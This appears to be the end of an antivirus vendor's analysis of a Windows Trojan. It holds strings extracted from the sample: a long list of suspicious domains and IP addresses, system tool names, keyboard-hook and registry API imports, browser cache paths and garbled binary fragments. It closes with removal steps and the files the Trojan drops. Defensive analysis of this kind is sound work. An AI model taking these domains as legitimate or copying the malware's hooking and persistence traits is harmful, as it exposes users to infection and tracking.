ty1400.com
ty442.com
ty443.com
tycjt1.com
uartaiz.com
up8090.com
upup.bbinma.com
usot399555.cn
uu11.cc
v8293.com
vic115.com
vic76.com
vip1922.com
vip345345.com
vns255.com
vns86.net
vtm006.com
w11e2.com
w6603.com
w88top.com
w88wap.com
weebly.com
wns0028.com
wns707.com
wofacai.com
VVV.0008.com
VVV.0029.com
VVV.012219.com
VVV.0177.com
VVV.01bc.com
VVV.06919.com
0951wx.com
VVV.1076.com
VVV.10816.com
VVV.111146.com
VVV.11303.com
VVV.11567.com
VVV.11sbc.com
VVV.138k.cc
VVV.145a.com
1524dh.com
VVV.156789.com
VVV.171100.com
VVV.177570.com
VVV.187203.com
VVV.20158.com
VVV.21222.com
VVV.2126e.com
VVV.2138s.com
VVV.224499.com
VVV.2246.com
VVV.22559.com
VVV.23036.com
VVV.23456.com
256s8s.me
VVV.257700.com
VVV.293477.com
VVV.30333.net
VVV.307250.com
VVV.31999.com
VVV.338ff.com
VVV.3505.com
VVV.36088l.com
VVV.365365.com
VVV.365445.com
VVV.39366.com
VVV.400444.com
VVV.4267.com
VVV.43336.com
VVV.4355.com
VVV.4616.com
VVV.4662.com
VVV.4707.com
VVV.478001.com
VVV.478009.com
VVV.48111.com
VVV.4886m.com
VVV.49499.com
VVV.55365.net
VVV.565.net
VVV.56666.net
VVV.58js.com
VVV.61cctv.com
VVV.63365.com
VVV.635005.com
VVV.656995.com
VVV.6590a.com
VVV.6590b.com
VVV.6590d.com
VVV.660022.com
VVV.6625ss.com
VVV.665252.com
VVV.666111.com
VVV.68mtv.com
VVV.710.co
VVV.710j.com
VVV.710jc.com
7689js.com
VVV.789990.com
VVV.7919.cc
VVV.793023.com
VVV.79709.com
VVV.7999.cc
VVV.7m.cn
VVV.7y163.com
VVV.80166.com
VVV.80456.com
VVV.80797.com
VVV.84777.com
VVV.869999.com
VVV.87pt8.com
VVV.87top.com
VVV.880ms.com
VVV.8-88d.com
VVV.88928.com
88jt.cc
88jt.net
VVV.895858.com
VVV.8edy.com
VVV.8ff77.com
VVV.8k018.com
VVV.9177b.com
VVV.9178b.com
VVV.91bcd.com
VVV.91ent.com
9599aa.com
9599gg.com
VVV.968yh.com
999jnh.com
VVV.abepk.com
VVV.ag983.com
VVV.ajtgl.com
VVV.am11.com
VVV.anhui365.net
VVV.ay017.com
VVV.ay039.com
VVV.ay741.com
VVV.ay951.com
VVV.aygj5.com
VVV.b138.cc
b22138.com
VVV.bb868.com
VVV.bebio.net.cn
VVV.bg33k.com
VVV.bmw7.com
VVV.bmw9.com
bo7727.com
VVV.bo88.com
VVV.bxchc.com
VVV.bxcho.com
VVV.bxchp.com
VVV.c77c.com
ca0033.com
VVV.ca151.com
VVV.ca518.com
VVV.ca88.com
VVV.ca881.com
VVV.ccav5.com
cd-cszs.com
VVV.chnfq.com
VVV.cmp8.com
VVV.cn-ady.com
VVV.co1860.com
VVV.cqqggqw.com
VVV.cr1118.com
VVV.cs0759.com
VVV.dc0066.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.du001.com
VVV.dy985.com
VVV.earui.com
VVV.farmer.com.cn
VVV.fmu8.com
VVV.godocha.com
VVV.hfyj.net
VVV.hi688.net
VVV.hj696.com
VVV.hjd56.com
hllzsxa.com
VVV.hnyqty.com
VVV.ht51.com
VVV.hv500.com
VVV.itb66.com
VVV.itb88.com
VVV.j331.com
VVV.jkhwq.com
VVV.jnh8.com
VVV.jxhu.com
VVV.kefu68.com
dgvictoria.com
sqslwang.com
6x6bct.com
qiye-dianping.com
shanyuansc.com
mw-electronics.com
emeipai.net
VVV.kl-cti.com
VVV.kur99.com
VVV.ll-49.com
VVV.m402.com
VVV.m99.com
VVV.mbet.cc
meihuale.com
mf9999.com
VVV.mfzbs.com
VVV.mg.cc
VVV.mg123.cm
VVV.mngye.com
VVV.mph4.cn
VVV.mr007.com
VVV.nxbyjt.com
VVV.p99.com
VVV.pgpop.com
VVV.pj686.com
VVV.ppp36.com
VVV.qn628.com
VVV.qoyari.com
VVV.qy459.com
ranshao.com
VVV.s138x.com
VVV.s138y.com
VVV.safea.gov.cn
sbdvip.com
VVV.sctv.com.cn
VVV.sdw11.com
VVV.shhbm.com
VVV.sopoer.com
VVV.t1889.com
VVV.tjjsd.com
VVV.ts8.org
VVV.ty06.com
VVV.tyc.com
tycyyy.com
VVV.ub58.com
VVV.v524.com
VVV.v7080.com
VVV.vic5.com
VVV.vn66.com
VVV.w88.com
VVV.wj880.com
VVV.x6168.com
VVV.x8832.com
VVV.xy306.com
VVV.y8.cc
VVV.y9.cc
VVV.y9.tt
VVV.yh478.net
VVV.yh88.com
yl2222.cc
yl8886.com
ylg8003.com
VVV.yqjnt.com
VVV.yxlm.cc
VVV.yxlm.com
VVV.zxx7.com
www-002.com
www-004455.com
www-1005.com
www-1307.com
www-23456.com
www-43899.com
www-55977.com
www-57365.com
www-80999.com
www-887700.com
wxc7700.com
wxjixing.com
x33138.com
x5660.com
x993.com
x9988111.com
xam31999.com
xbao99.com
xbyl345.com
xc333.top
xin1946.com
xinbao169.com
xinyu588.com
xiudu868.com
xj38a.com
xx2007.com
xyx5188.com
y33138.com
y8b88.com
yb633.com
yccrab.net
yidali11.com
yilin027.com
ying993.com
yinhemmm.com
ykdiman.net
yl0000.org
yl882288.com
ylg2099.com
ylg2299.com
ylg6266.com
ylg6366.com
ylg6696.com
ylg8838.com
ylg8999.com
ylg9099.com
ylg9999.com
yo56378.com
yo84756.com
yo86567.com
youle44.com
youyou456.com
yrmt168.com
yrmt321.com
yubojiu.com
yuebet188.com
yuefabo.com
yusheedu.com
yyhanmai.com
yyy588.com
yz188.com
yzc1188.com
yzc178.com
yzc262.com
yzc363.com
zcxtzx.com
zgbetter.com
zggpcps.com
zr88a.cc
ztc-fz.com
ztgryfv.com
zuijiabo.com
zviwmeb.com
zz402.com
zz565.net
zzxh371.com
zzxinhangdao.com
VVV.17ycw.cn
calrafini.com
shantingst.com
xingfumimi.com
aweifile.com
wzhongxing.net
118.178.243.200
lanuor.net
kailemusic.net
yaomishi.com
xiamenpainting.com
zhkingpower.com
ruichihongjiu.com
szymtjy.com
www1.juyhf.com
121.40.239.48
188ks.com
VVV.20shopping.com
VVV.xc185.com
VVV.wa0592.com
VVV.xinly.net
dantouqibing.com
19771128.com
baitafengshui.com
xhnjt.cc
47.89.59.67
021sjjc.com
wy.92wy.com
99j.com
66169.com
91yidao.com
mishicq.com
8090cqg.com
860580.com
345zx.com
VVV.melaleuca.com.cn
45woool.com
hhgft.com
eachinfo.com
ucbug.com
VVV.44tf.com
haof.44tf.com
sfacg.com
xyxzgw.com
121.41.16.196
941pojie.com
162.212.181.20
93yd.com
haofupk.com
99inf.com
VVV.ssswm.com
s1904.com
99ting.cn
VVV.wowms.com
mc520.com
VVV.wan50.com
VVV.wf998.com
20shopping.com
net.17ycw.cn
1234567edu.com
VVV.559u.com
VVV.wg941.com
tg.mshax.com
taitognpump.com
52345.cn
921pt.com
52anzu.com
122.224.33.49
xingzhaohao.com
30ok.com
haosf.me
haosf.ws
99s.com
huzu123.com
268pk.cn
520jdwg.com
s.h1995.com
VVV.54dc.com
cqhaobangshou.com
haosf.tv
swufe.net
shutu.cc
54zz.com
markosweb.com
33sf.com
44145.wang
44134.wang
192yx.com
shenqi.com
175sf.com
sf999.com
fu.juyhf.com
2688tc.com
grrfg.com
sf822.com
rxjh45.com
zhaosf.mobi
zhaowoool.com
sewsx.com
015999.com
VVV.93u.com
ditulao.com
sf999.ws
shangjz.com
cydfh.com
zhoupuinc.com
zmdsnjtgw.com
cqw6.com
hangzhou.aliyuncs.com
zlyzpw.com
uu171.com
cuwoool.cn
1778st.com
183.131.85.133
18wanmei.com
72714.wang
9kf.com
bibuzhengrong.com
cq697.com
d34dd.com
dj665.com
kofbobo.net
kongzhifamen.com
wanwan88.com
VVV.97mc.com
VVV.qiqiweb.com
VVV.vivi2.com
wxyongshang.com
zhaokf.com
zhaosf.cc
sf123uu.com
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
cacls.exe
extrac32.exe
wiaacmgr.exe
net.exe
sfc.exe
sort.exe
taskkill.exe
timeout.exe
wininit.exe
xcopy.exe
netsh.exe
notepad.exe
regedit.exe
reg.exe
rundll32.exe
cmd.exe
{C6CBEC98-70B9-4991-8CE5-5D846D28740C}
{60853F8B-2218-49CF-A58D-2561B9550406}
.dll, RunIt
C:\Windows\sysnative\Drivers\
%s [%8X][%d]
TMyIdTCPServerEventCall
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
PubwinClient.exe
.hao123.com
VVV.baidu.com/
hXXp://
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
TMyCheckOpenUrl
TDRIVER_UrlWatchList
VVV.2345.com
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
rwyNCMc.exe
play.bat
hXXps://123.sogou.com/?71156-5497
hXXp://VVV.ip.cn/
b~~z0%%cz$ndyorc~$ieg%
pWin7Server.exe
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
KERNEL32.DLL
360Chrome\Chrome\
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
hinthk.dll
http:
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
-t}cy
=<;:9876543210/.-, *)('&%$#"!
.fQt7
.OX4a
^&%D\H
j6.bm2
).Kdn
&%S[)
.qV1l
-K9.rR[#
.FGzl
.mC)*
8h'PGŒ
=,.Qw
m*>.KnW
Ct.NA
.IYj<&_
U%s[*
 wR%c
:.on,.
.Eo{ms
8 [D.ns
 '~%Uo
:%XG?
.gU*Y
Uq`%x?\
L.PYv
.uQ0<
>qzBM%D
6gdg%S.
\Ÿ7g
.Uea|S
n,X%uR
6?~%s
h%d$nC
.jelX
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegNotifyChangeKeyValue
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
GetProcessHandleCount
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
MyHTTPSProxyRF
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(/*) ,*/.)*72-9
87\22,-!(6!
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries
Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

f23bb1c179d6ccab543d15af98e5eea.exe_260_rwx_02B50000_00003000:

SearchProtocolHost.exe_1084:

SearchFilterHost.exe_3616:


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1024

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\mbHtGKAn.dll (12 bytes)
    C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (2264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\LMJxkS.dll (10 bytes)
    C:\Windows\wrhKvXr\yAXHMEya.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Windows\wrhKvXr\hDuVSc.dll (16661 bytes)
    C:\Windows\wrhKvXr\lMmgfUJPh.dll (264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Windows\System32\14532e\CDClient_EX.sys (117 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
